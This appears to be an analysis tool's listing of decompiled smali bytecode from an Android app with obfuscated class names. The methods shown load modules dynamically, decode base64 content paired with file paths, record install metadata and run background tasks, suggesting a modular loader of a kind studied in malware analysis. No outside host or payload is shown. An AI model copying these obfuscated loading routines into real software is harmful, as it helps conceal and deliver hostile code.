13iget-boolean v2, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
14if-eqz v2, :cond_6
15const/4 v2, 0x0
16iput-boolean v2, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
17goto/16 :goto_6
18cond_1a:
19sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
21invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
22move-result-object v1
23cond_20:
24invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
25move-result v0
26if-eqz v0, :cond_46
28invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
29move-result-object v0
30check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
32iget-object v2, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
34iget-object v3, p1, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
36invoke-virtual {v2, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
37move-result v2
38if-eqz v2, :cond_20
39const/4 v1, 0x1
40iput-boolean v1, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
42invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
43move-result-wide v1
44iput-wide v1, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->Odjrct:J
46iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
48sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
50invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->Odjrct(Ljava/util/List;)V
51cond_46: return-void
Cross References
APIs
  • java.io.File.<init>
  • java.io.File.length
  • java.io.FileInputStream.<init>
  • java.lang.Math.min
  • java.io.FileInputStream.skip
  • java.io.FileInputStream.read
  • java.io.FileInputStream.close
  • java.lang.Exception.printStackTrace
Position Instruction Meta Information
0const/4 v1, 0x0
1try_start_1: new-instance v0, Ljava/io/File;
3invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
5invoke-virtual {v0}, Ljava/io/File;->length()J
6move-result-wide v2
7long-to-int v2, v2
8new-instance v3, Ljava/io/FileInputStream;
10invoke-direct {v3, v0}, Ljava/io/FileInputStream;-><init>(Ljava/io/File;)V
11const/16 v0, 0x2000
13invoke-static {v2, v0}, Ljava/lang/Math;->min(II)I
14move-result v0
15new-array v0, v0, [B
16array-length v4, v0
17sub-int/2addr v2, v4
18int-to-long v4, v2
20invoke-virtual {v3, v4, v5}, Ljava/io/FileInputStream;->skip(J)J
22invoke-virtual {v3, v0}, Ljava/io/FileInputStream;->read([B)I
23move-result v2
24if-lez v2, :cond_36
26invoke-static {v0, v2}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ([BI)Ljava/lang/String;
27try_end_27: move-result-object v0
28try_start_28:
29invoke-virtual {v3}, Ljava/io/FileInputStream;->close()V
30goto_2b: return-object v0
31catch_2c: move-exception v0
32move-object v6, v0
33move-object v0, v1
34move-object v1, v6
35goto_30:
36invoke-virtual {v1}, Ljava/lang/Exception;->printStackTrace()V
37goto/16 :goto_2b
38catch_34: move-exception v1
39goto/16 :goto_30
40cond_36: move-object v0, v1
41goto/16 :goto_28
Cross References
APIs
  • java.util.ArrayList.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.String.split
  • java.lang.String.equals
Strings
  • ,
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->DiXsQ:Ljava/util/ArrayList;
3invoke-virtual {v0}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
4move-result-object v2
5cond_6:
6invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
7move-result v0
8if-eqz v0, :cond_2a
10invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
11move-result-object v0
12check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;
14iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->Odjrct:Ljava/lang/String;
16const-string v3, ","
18invoke-virtual {v1, v3}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
19move-result-object v3
20array-length v4, v3
21const/4 v1, 0x0
22goto_1c: if-ge v1, v4, :cond_6
23aget-object v5, v3, v1
25invoke-virtual {v5, p1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
26move-result v5
27if-eqz v5, :cond_27
28goto_26: return-object v0
29cond_27: add-int/lit8 v1, v1, 0x1
30goto/16 :goto_1c
31cond_2a: const/4 v0, 0x0
32goto/16 :goto_26
Cross References
APIs
  • android.content.SharedPreferences.getLong
  • java.lang.System.currentTimeMillis
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putLong
  • android.content.SharedPreferences$Editor.commit
Strings
  • 84189149191
Position Instruction Meta Information
0const-wide/16 v2, 0x0
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;->DiXsQ:Landroid/content/SharedPreferences;
4const-string v1, "84189149191"
6invoke-interface {v0, v1, v2, v3}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J
7move-result-wide v0
8cmp-long v2, v0, v2
9if-eqz v2, :cond_f
10goto_e: return-wide v0
11cond_f:
12invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
13move-result-wide v0
15iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;->DiXsQ:Landroid/content/SharedPreferences;
17invoke-interface {v2}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
18move-result-object v2
20const-string v3, "84189149191"
22invoke-interface {v2, v3, v0, v1}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;
23move-result-object v2
25invoke-interface {v2}, Landroid/content/SharedPreferences$Editor;->commit()Z
26goto/16 :goto_e
Cross References
APIs
  • android.content.SharedPreferences.edit
  • org.json.JSONObject.toString
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.apply
  • org.json.JSONException.printStackTrace
Strings
  • wyiutrbelnq
Position Instruction Meta Information
0try_start_0:
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
3invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
4move-result-object v0
6const-string v1, "wyiutrbelnq"
8invoke-virtual {p1}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->Odjrct()Lorg/json/JSONObject;
9move-result-object v2
11invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
12move-result-object v2
14invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
15move-result-object v0
17invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->apply()V
18try_end_17: return-object p1
19catch_18: move-exception v0
21invoke-virtual {v0}, Lorg/json/JSONException;->printStackTrace()V
22goto/16 :goto_17
Cross References
APIs
  • android.content.Context.getResources
  • android.content.Context.getPackageName
  • android.content.res.Resources.getIdentifier
  • android.content.res.Resources.getString
Strings
  • labelid
  • string
Position Instruction Meta Information
0try_start_0:
1invoke-virtual {p0}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
2move-result-object v0
4const-string v1, "labelid"
6const-string v2, "string"
8invoke-virtual {p0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
9move-result-object v3
11invoke-virtual {v0, v1, v2, v3}, Landroid/content/res/Resources;->getIdentifier(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)I
12move-result v1
14invoke-virtual {v0, v1}, Landroid/content/res/Resources;->getString(I)Ljava/lang/String;
15try_end_13: move-result-object v0
16goto_14: return-object v0
17catch_15: move-exception v0
19const-string v0, ""
20goto/16 :goto_14
Cross References
APIs
  • org.json.JSONObject.getString
  • android.util.Base64.decode
  • org.json.JSONObject.getString
  • com.czybg.eqtbdmzpklrgyns.cXdqo.<init>
Strings
  • cnt
  • filepath
Position Instruction Meta Information
0new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;
2const-string v1, "cnt"
4invoke-virtual {p0, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
5move-result-object v1
6const/4 v2, 0x0
8invoke-static {v1, v2}, Landroid/util/Base64;->decode(Ljava/lang/String;I)[B
9move-result-object v1
11invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;-><init>([B)V
13const-string v1, "filepath"
15invoke-virtual {p0, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
16move-result-object v1
17new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;
19invoke-direct {v2, v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;-><init>(Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;Ljava/lang/String;)V
20return-object v2
Cross References
APIs
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • com.czybg.eqtbdmzpklrgyns.wymvtEV.<init>
  • android.os.AsyncTask.executeOnExecutor
  • org.json.JSONException.printStackTrace
  • android.os.AsyncTask.execute
Position Instruction Meta Information
1sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
3invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
4move-result-object v1
5cond_6:
6invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
7move-result v0
8if-eqz v0, :cond_19
10invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
11move-result-object v0
12check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
13iget-boolean v2, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
14if-eqz v2, :cond_6
15goto_16: if-nez v0, :cond_1b
16goto_18: return-void
17cond_19: const/4 v0, 0x0
18goto/16 :goto_16
19cond_1b: new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
21iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->xnLvoQ:Landroid/content/Context;
23invoke-direct {v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;-><init>(Landroid/content/Context;)V
24try_start_22: new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
26iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->xnLvoQ:Landroid/content/Context;
28invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->xnLvoQ()Ljava/lang/String;
29move-result-object v4
31invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->hZyMGHgz()Ljava/lang/String;
32move-result-object v1
34invoke-direct {v2, v3, v4, v1}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;-><init>(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)V
36invoke-virtual {v2}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ()Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
37move-result-object v1
39invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct()Lorg/json/JSONObject;
40move-result-object v1
42iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
43new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;
45invoke-direct {v2, p0}, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;-><init>(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)V
46new-instance v3, Lcom/czybg/eqtbdmzpklrgyns/wymvtEV;
48invoke-direct {v3, v0, v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/wymvtEV;-><init>(Ljava/lang/String;Lorg/json/JSONObject;Lcom/czybg/eqtbdmzpklrgyns/biaGZ;)V
49sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
50const/16 v1, 0xb
51if-lt v0, v1, :cond_59
53sget-object v0, Landroid/os/AsyncTask;->THREAD_POOL_EXECUTOR:Ljava/util/concurrent/Executor;
54const/4 v1, 0x0
55new-array v1, v1, [Ljava/lang/Void;
57invoke-virtual {v3, v0, v1}, Landroid/os/AsyncTask;->executeOnExecutor(Ljava/util/concurrent/Executor;[Ljava/lang/Object;)Landroid/os/AsyncTask;
58try_end_53: goto/16 :goto_18
59catch_54: move-exception v0
61invoke-virtual {v0}, Lorg/json/JSONException;->printStackTrace()V
62goto/16 :goto_18
63cond_59: const/4 v0, 0x0
64try_start_5a: new-array v0, v0, [Ljava/lang/Void;
66invoke-virtual {v3, v0}, Landroid/os/AsyncTask;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;
67try_end_5f: goto/16 :goto_18
Cross References
APIs
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.Integer.intValue
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.put
  • java.util.concurrent.ConcurrentHashMap.<init>
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
3invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->LmcGi()Ljava/util/List;
4move-result-object v0
6invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
7move-result-object v1
8goto_a:
9invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
10move-result v0
11if-eqz v0, :cond_32
13invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
14move-result-object v0
15check-cast v0, Ljava/lang/Integer;
16try_start_16:
17iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
19iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->jVOak:Landroid/content/Context;
21invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
22move-result v0
24invoke-virtual {v2, v3, v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ(Landroid/content/Context;I)Lcom/czybg/eqtbdmzpklrgyns/Module;
25move-result-object v0
27iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
29iget-object v3, v0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
30iget v3, v3, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
32invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
33move-result-object v3
35invoke-virtual {v2, v3, v0}, Ljava/util/concurrent/ConcurrentHashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
36try_end_2f: goto/16 :goto_a
37catch_30: move-exception v0
38goto/16 :goto_a
39cond_32: new-instance v0, Ljava/util/concurrent/ConcurrentHashMap;
41iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
43invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ()Ljava/util/Map;
44move-result-object v1
46invoke-direct {v0, v1}, Ljava/util/concurrent/ConcurrentHashMap;-><init>(Ljava/util/Map;)V
47iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
48return-void
Cross References
APIs
  • java.lang.Object.<init>
  • java.util.ArrayList.<init>
  • android.content.Context.getPackageName
  • android.content.Context.getPackageManager
  • android.content.Context.getPackageName
  • android.content.pm.PackageManager.getInstallerPackageName
Position Instruction Meta Information
0const/4 v1, 0x0
2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3iput v1, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->DiXsQ:I
5const-string v0, ""
6iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->Odjrct:Ljava/lang/String;
8const-string v0, ""
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->LmcGi:Ljava/lang/String;
11const-string v0, ""
12iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->hZyMGHgz:Ljava/lang/String;
13iput v1, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->xnLvoQ:I
14iput v1, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->jVOak:I
15iput v1, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->CyGFDR:I
17const-string v0, ""
18iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->EZmcnv:Ljava/lang/String;
20const-string v0, ""
21iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->phHwgb:Ljava/lang/String;
23const-string v0, ""
24iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->uKFQsLn:Ljava/lang/String;
26const-string v0, ""
27iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->lVfyLT:Ljava/lang/String;
28iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->xfPEz:Z
30const-string v0, ""
31iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->IwTvjRW:Ljava/lang/String;
32new-instance v0, Ljava/util/ArrayList;
34invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
35iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->DoHnmwOG:Ljava/util/List;
36iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->FySkt:Z
37iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->TikzFyJI:Z
38const/16 v0, 0xe
39iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->xnLvoQ:I
40iput-object p3, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->LmcGi:Ljava/lang/String;
41iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->VvXSDk:Z
43invoke-static {p1}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz(Landroid/content/Context;)I
44move-result v0
45iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->CyGFDR:I
46iget v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->CyGFDR:I
47iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->jVOak:I
49invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
50move-result-object v0
51iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->EZmcnv:Ljava/lang/String;
52iput-object p2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->phHwgb:Ljava/lang/String;
53try_start_53:
54invoke-virtual {p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
55move-result-object v0
57invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
58move-result-object v1
60invoke-virtual {v0, v1}, Landroid/content/pm/PackageManager;->getInstallerPackageName(Ljava/lang/String;)Ljava/lang/String;
61move-result-object v0
62iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->IwTvjRW:Ljava/lang/String;
63try_end_61:
64invoke-static {p1}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct(Landroid/content/Context;)Ljava/util/List;
65move-result-object v0
66iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->DoHnmwOG:Ljava/util/List;
67goto_67:
68invoke-static {p1}, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->DiXsQ(Landroid/content/Context;)Z
69move-result v0
70iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->TikzFyJI:Z
71return-void
72catch_6e: move-exception v0
73goto/16 :goto_67
74catch_70: move-exception v0
75goto/16 :goto_61
Cross References
APIs
  • java.lang.Object.<init>
  • java.util.concurrent.ConcurrentHashMap.<init>
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
Position Instruction Meta Information
0const/4 v1, 0x0
2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ:Z
4new-instance v0, Ljava/util/concurrent/ConcurrentHashMap;
6invoke-direct {v0}, Ljava/util/concurrent/ConcurrentHashMap;-><init>()V
7iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
8new-instance v0, Ljava/util/concurrent/ConcurrentHashMap;
10invoke-direct {v0}, Ljava/util/concurrent/ConcurrentHashMap;-><init>()V
11iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DoHnmwOG:Ljava/util/concurrent/ConcurrentHashMap;
12new-instance v0, Ljava/util/concurrent/ConcurrentHashMap;
14invoke-direct {v0}, Ljava/util/concurrent/ConcurrentHashMap;-><init>()V
15iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
16iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->phHwgb:Z
17iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->uKFQsLn:Z
18new-instance v0, Landroid/os/Handler;
20invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
21move-result-object v1
23invoke-direct {v0, v1}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
24iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->IwTvjRW:Landroid/os/Handler;
25new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/KPMIv;
27invoke-direct {v0, p0}, Lcom/czybg/eqtbdmzpklrgyns/KPMIv;-><init>(Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;)V
28iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->ciatqPxI:Ljava/lang/Runnable;
29new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/pWPzfqIH;
31invoke-direct {v0, p0}, Lcom/czybg/eqtbdmzpklrgyns/pWPzfqIH;-><init>(Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;)V
32iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->VvXSDk:Lcom/czybg/eqtbdmzpklrgyns/ECaKFvg;
33iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->jVOak:Landroid/content/Context;
34iput-object p4, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->Odjrct:Ljava/lang/String;
35iput-object p3, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->LmcGi:Ljava/lang/String;
36iput-object p2, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->lVfyLT:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
37new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
39invoke-direct {v0, p1, p2, p3, p4}, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;Ljava/lang/String;Ljava/lang/String;)V
40iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
41new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
43invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;-><init>(Landroid/content/Context;)V
44iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->FySkt:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
45new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
47invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;-><init>(Landroid/content/Context;)V
48iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
49new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
51invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;-><init>(Landroid/content/Context;)V
52iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->TikzFyJI:Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
54invoke-direct {p0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ()V
55return-void
APIs
  • com.czybg.eqtbdmzpklrgyns.ProgressActivity.findViewById
  • android.view.View.setVisibility
  • com.czybg.eqtbdmzpklrgyns.ProgressActivity.findViewById
  • android.view.View.setVisibility
  • com.czybg.eqtbdmzpklrgyns.ProgressActivity.findViewById
  • android.view.View.setOnClickListener
Position Instruction Meta Information
0.prologue
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$1;->this$0:Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;
3const v1, 0x7f09000e
5invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;->findViewById(I)Landroid/view/View;
6move-result-object v0
7const/4 v1, 0x0
9invoke-virtual {v0, v1}, Landroid/view/View;->setVisibility(I)V
11iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$1;->this$0:Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;
12const v1, 0x7f09000c
14invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;->findViewById(I)Landroid/view/View;
15move-result-object v0
16const/16 v1, 0x8
18invoke-virtual {v0, v1}, Landroid/view/View;->setVisibility(I)V
20iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$1;->this$0:Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;
21const v1, 0x7f090011
23invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;->findViewById(I)Landroid/view/View;
24move-result-object v0
25new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$1$1;
27invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$1$1;-><init>(Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$1;)V
29invoke-virtual {v0, v1}, Landroid/view/View;->setOnClickListener(Landroid/view/View$OnClickListener;)V
30return-void
APIs
  • android.app.Activity.onCreate
  • com.czybg.eqtbdmzpklrgyns.AyMuwwlC.getIntent
  • java.lang.Exception.printStackTrace
Strings
  • onCreate
Position Instruction Meta Information
1invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
3invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->getIntent()Landroid/content/Intent;
4move-result-object v0
6invoke-static {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ(Landroid/content/Context;Landroid/content/Intent;)Lcom/czybg/eqtbdmzpklrgyns/Module;
7move-result-object v0
8if-eqz v0, :cond_17
9try_start_d:
10invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->getIntent()Landroid/content/Intent;
11move-result-object v1
13invoke-virtual {v0, p0, v1}, Lcom/czybg/eqtbdmzpklrgyns/Module;->activity(Landroid/content/Context;Landroid/content/Intent;)Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
14move-result-object v0
15iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
16try_end_17:
17iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
18if-eqz v0, :cond_22
20iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
22const-string v1, "onCreate"
24invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->DiXsQ(Ljava/lang/String;)V
25cond_22: return-void
26catch_23: move-exception v0
28invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
29goto/16 :goto_17
Cross References
APIs
  • com.czybg.eqtbdmzpklrgyns.zlSgts.<init>
  • java.lang.String.split
  • java.util.ArrayList.<init>
  • java.util.ArrayList.add
Strings
